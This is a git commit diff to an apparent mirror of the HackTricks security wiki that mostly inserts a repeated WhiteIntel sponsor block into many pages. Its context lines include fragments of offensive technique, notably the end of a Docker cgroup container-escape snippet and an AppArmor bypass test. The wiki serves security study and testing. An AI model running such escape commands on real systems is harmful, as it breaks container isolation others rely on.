mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
wi
This commit is contained in:
parent
7634b077f4
commit
780b55a21d
34 changed files with 860 additions and 3 deletions
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
# Summary of the attack
|
# Summary of the attack
|
||||||
|
|
||||||
|
@ -48,6 +62,17 @@ If an attacker wants to append the string "append" he can:
|
||||||
|
|
||||||
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
|
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
|
||||||
|
|
||||||
|
@ -44,7 +58,7 @@ For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsides
|
||||||
|
|
||||||
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||||
|
|
||||||
```
|
```bash
|
||||||
python3 dnscat_decoder.py sample.pcap bad_domain
|
python3 dnscat_decoder.py sample.pcap bad_domain
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
|
@ -16,6 +16,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Improve your Wireshark skills
|
## Improve your Wireshark skills
|
||||||
|
|
||||||
### Tutorials
|
### Tutorials
|
||||||
|
@ -168,6 +182,18 @@ f.write(all_bytes)
|
||||||
f.close()
|
f.close()
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -1,5 +1,19 @@
|
||||||
# Threat Modeling
|
# Threat Modeling
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Threat Modeling
|
## Threat Modeling
|
||||||
|
|
||||||
Welcome to HackTricks' comprehensive guide on Threat Modeling! Embark on an exploration of this critical aspect of cybersecurity, where we identify, understand, and strategize against potential vulnerabilities in a system. This thread serves as a step-by-step guide packed with real-world examples, helpful software, and easy-to-understand explanations. Ideal for both novices and experienced practitioners looking to fortify their cybersecurity defenses.
|
Welcome to HackTricks' comprehensive guide on Threat Modeling! Embark on an exploration of this critical aspect of cybersecurity, where we identify, understand, and strategize against potential vulnerabilities in a system. This thread serves as a step-by-step guide packed with real-world examples, helpful software, and easy-to-understand explanations. Ideal for both novices and experienced practitioners looking to fortify their cybersecurity defenses.
|
||||||
|
@ -109,3 +123,16 @@ Now your finished model should look something like this. And this is how you mak
|
||||||
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
|
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
|
||||||
|
|
||||||
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
|
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
# Check for possible actions inside the GUI application
|
# Check for possible actions inside the GUI application
|
||||||
|
|
||||||
|
@ -289,6 +303,18 @@ These shortcuts are for the visual settings and sound settings, depending on the
|
||||||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
## Basic Information
|
## Basic Information
|
||||||
|
|
||||||
|
@ -65,6 +79,19 @@ In a setup with multiple auth modules, the process follows a strict order. If th
|
||||||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Basic Information
|
## Basic Information
|
||||||
|
|
||||||
AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions.
|
AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions.
|
||||||
|
@ -306,6 +320,18 @@ chmod +x /tmp/test.pl
|
||||||
/tmp/test.pl
|
/tmp/test.pl
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
**For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary:
|
**For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary:
|
||||||
|
|
||||||
|
@ -71,6 +85,17 @@ chmod a+x /cmd
|
||||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Main Keychains
|
## Main Keychains
|
||||||
|
|
||||||
* The **User Keychain** (`~/Library/Keychains/login.keycahin-db`), which is used to store **user-specific credentials** like application passwords, internet passwords, user-generated certificates, network passwords, and user-generated public/private keys.
|
* The **User Keychain** (`~/Library/Keychains/login.keycahin-db`), which is used to store **user-specific credentials** like application passwords, internet passwords, user-generated certificates, network passwords, and user-generated public/private keys.
|
||||||
|
@ -134,6 +148,18 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os
|
||||||
|
|
||||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Memory Artifacts
|
## Memory Artifacts
|
||||||
|
|
||||||
### Swap Files
|
### Swap Files
|
||||||
|
@ -66,6 +80,18 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
### Common Users
|
### Common Users
|
||||||
|
|
||||||
* **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_":
|
* **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_":
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
**For further information check: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
**For further information check: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||||
|
|
||||||
Android apps can use native libraries, typically written in C or C++, for performance-critical tasks. Malware creators also use these libraries, as they're harder to reverse engineer than DEX bytecode. The section emphasizes reverse engineering skills tailored to Android, rather than teaching assembly languages. ARM and x86 versions of libraries are provided for compatibility.
|
Android apps can use native libraries, typically written in C or C++, for performance-critical tasks. Malware creators also use these libraries, as they're harder to reverse engineer than DEX bytecode. The section emphasizes reverse engineering skills tailored to Android, rather than teaching assembly languages. ARM and x86 versions of libraries are provided for compatibility.
|
||||||
|
@ -57,6 +71,19 @@ Android apps can use native libraries, typically written in C or C++, for perfor
|
||||||
- **Debugging Native Libraries:**
|
- **Debugging Native Libraries:**
|
||||||
- [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
- [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Installing Frida
|
## Installing Frida
|
||||||
|
|
||||||
**Steps to install Frida on a Jailbroken device:**
|
**Steps to install Frida on a Jailbroken device:**
|
||||||
|
@ -377,6 +391,20 @@ iOS only stores 25 crashes of the same app, so you need to clean that or iOS wil
|
||||||
|
|
||||||
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Basic Information
|
## Basic Information
|
||||||
|
|
||||||
